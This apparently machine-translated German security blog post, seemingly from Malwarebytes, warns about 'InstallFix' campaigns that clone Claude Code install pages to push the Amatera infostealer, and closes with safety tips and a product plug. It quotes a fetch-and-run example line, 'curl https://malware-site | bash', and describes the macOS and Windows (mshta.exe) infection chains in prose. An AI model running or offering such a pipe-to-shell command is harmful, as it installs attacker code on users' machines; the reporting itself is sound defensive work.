Angreifer klonen Installationsseiten für beliebte Tools wie Claude Code und ersetzen die „Einzeiler“-Installationsbefehle durch Malware, hauptsächlich um Passwörter, Cookies, Sitzungen und den Zugriff auf Entwicklerumgebungen zu stehlen.
In modernen Installationsanleitungen wird oft empfohlen, einen einzigen Befehl zu kopieren, wie z. B. curl https://malware-site | bash in Ihr Terminal ein und drücken Sie die Eingabetaste. Diese Gewohnheit verwandelt die Website in eine Fernbedienung: Jedes Skript, das sich unter dieser URL befindet, wird mit Ihren Berechtigungen ausgeführt, oft denen eines Administrators.
Forscher haben herausgefunden, dass Angreifer diesen Arbeitsablauf missbrauchen, indem sie alles identisch lassen und nur die Stelle ändern, an die dieser Einzeiler tatsächlich verbunden ist. Für viele nicht spezialisierte Benutzer, die gerade erst begonnen haben, KI- und Entwicklertools zu verwenden, erscheint diese Methode normal, sodass sie ihre Wachsamkeit verringern.
Aber im Grunde läuft das auf „Ich vertraue dieser Domain“ hinaus, und das ist keine gute Idee, es sei denn, Sie wissen mit Sicherheit, dass sie vertrauenswürdig ist.
Normalerweise läuft es so ab: Jemand sucht nach „Claude Code installieren“ oder „Claude Code CLI“, sieht oben ein gesponsertes Ergebnis mit einer plausiblen URL und klickt darauf, ohne groß darüber nachzudenken.
Diese Anzeige führt jedoch zu einer geklonten Dokumentations- oder Download-Seite: dasselbe Logo, dieselbe Seitenleiste, derselbe Text und ein vertrauter „Kopieren“-Button neben dem Installationsbefehl. In vielen Fällen leitet jeder andere Link, auf den Sie auf dieser gefälschten Seite klicken, Sie unbemerkt zur echten Website des Anbieters weiter, sodass nichts anderes verdächtig erscheint.
Ähnlich wie bei ClickFix-Angriffen wird diese Methode als InstallFix bezeichnet. Der Benutzer führt unter falschen Vorwänden den Code aus, der seinen eigenen Computer infiziert, wobei es sich bei der Nutzlast in der Regel um einen Infostealer handelt.
Die Hauptnutzlast in diesen InstallFix-Fällen mit Claude-Code-Thematik ist ein Infostealer namens Amatera. Er konzentriert sich auf Browserdaten wie gespeicherte Passwörter, Cookies, Sitzungstoken, Daten für die automatische Ausfüllung und allgemeine Systeminformationen, die Angreifern helfen, ein Profil des Geräts zu erstellen. Damit können sie Websitzungen kapern und sich in Cloud-Dashboards und interne Administratorpanels einloggen, ohne jemals Ihr tatsächliches Passwort zu benötigen. Einige Berichte erwähnen auch ein Interesse an Krypto-Wallets und anderen hochwertigen Konten.
Windows Mac
Die auf dem Claude-Code basierende Kampagne, die die Forscher entdeckt haben, war darauf ausgerichtet, sowohl Windows Mac anzusprechen.
Unter macOS ruft der bösartige Einzeiler in der Regel ein Skript der zweiten Stufe von einer vom Angreifer kontrollierten Domain ab, das häufig mit Base64 verschleiert ist, um auf den ersten Blick unauffällig und harmlos zu wirken. Dieses Skript lädt dann eine Binärdatei von einer weiteren Domain herunter, entfernt Attribute und macht sie ausführbar, bevor es sie startet.
Unter Windows wurde beobachtet, dass der Befehl cmd.exe, das dann mshta.exe mit einer Remote-URL. Dadurch kann die Malware-Logik als vertrauenswürdige Microsoft-Binärdatei statt als offensichtliche zufällige ausführbare Datei ausgeführt werden. In beiden Fällen erscheint nichts Auffälliges auf dem Bildschirm: Sie glauben, Sie hätten lediglich ein Tool installiert, während die eigentliche Payload im Hintergrund unbemerkt ihre Arbeit aufnimmt.
Wie man sicher bleibt
Da ClickFix und InstallFix grassieren – und es nicht so aussieht, als würden sie bald verschwinden –, ist es wichtig, aufmerksam, vorsichtig und geschützt zu sein.
- Machen Sie langsam.Befolgen Sie Anweisungen auf einer Webseite oder in einer Eingabeaufforderung nichtübereilt, insbesondere wenn Sie aufgefordert werden, Befehle auf Ihrem Gerät auszuführen oder Code zu kopieren und einzufügen. Analysieren Sie, was der Befehl bewirkt, bevor Sie ihn ausführen.
- Vermeiden Sie es, Befehle oder Skripte aus nicht vertrauenswürdigen Quellen auszuführen.Führen Sie niemalsCode oder Befehle aus, die Sie von Websites, aus E-Mails oder Nachrichten kopiert haben, es sei denn, Sie vertrauen der Quelle und verstehen den Zweck der Aktion. Überprüfen Sie Anweisungen unabhängig. Wenn Sie auf einer Website aufgefordert werden, einen Befehl auszuführen oder eine technische Aktion durchzuführen, überprüfen Sie dies anhand der offiziellen Dokumentation oder wenden Sie sich an den Support, bevor Sie fortfahren.
- Beschränken Sie die Verwendung von Kopieren und Einfügen für Befehle. Durch manuellesEingeben von Befehlen anstelle von Kopieren und Einfügen können Sie das Risiko verringern, unwissentlich bösartige Payloads auszuführen, die in kopiertem Text versteckt sind.
- Sichern Sie Ihre Geräte. Verwenden Sieeine aktuelle Echtzeit-Anti-Malware-Lösungmit einer Webschutzkomponente.
- Informieren Sie sich über neue Angriffstechniken.Das Verständnis, dass Angriffe aus unerwarteten Richtungen kommen und sich weiterentwickeln können, hilft Ihnen, wachsam zu bleiben. Lesen Sie weiter unseren Blog!
Profi-Tipp:Wussten Sie, dass die kostenlose Malwarebytes Browser Guard Sie warnt, wenn eine Website versucht, etwas in Ihre Zwischenablage zu kopieren?
Wir berichten nicht nur über Bedrohungen - wir beseitigen sie
Cybersecurity-Risiken sollten nie über eine Schlagzeile hinausgehen. Laden Sie noch heute Malwarebytes herunter, um Bedrohungen von Ihren Geräten fernzuhalten.
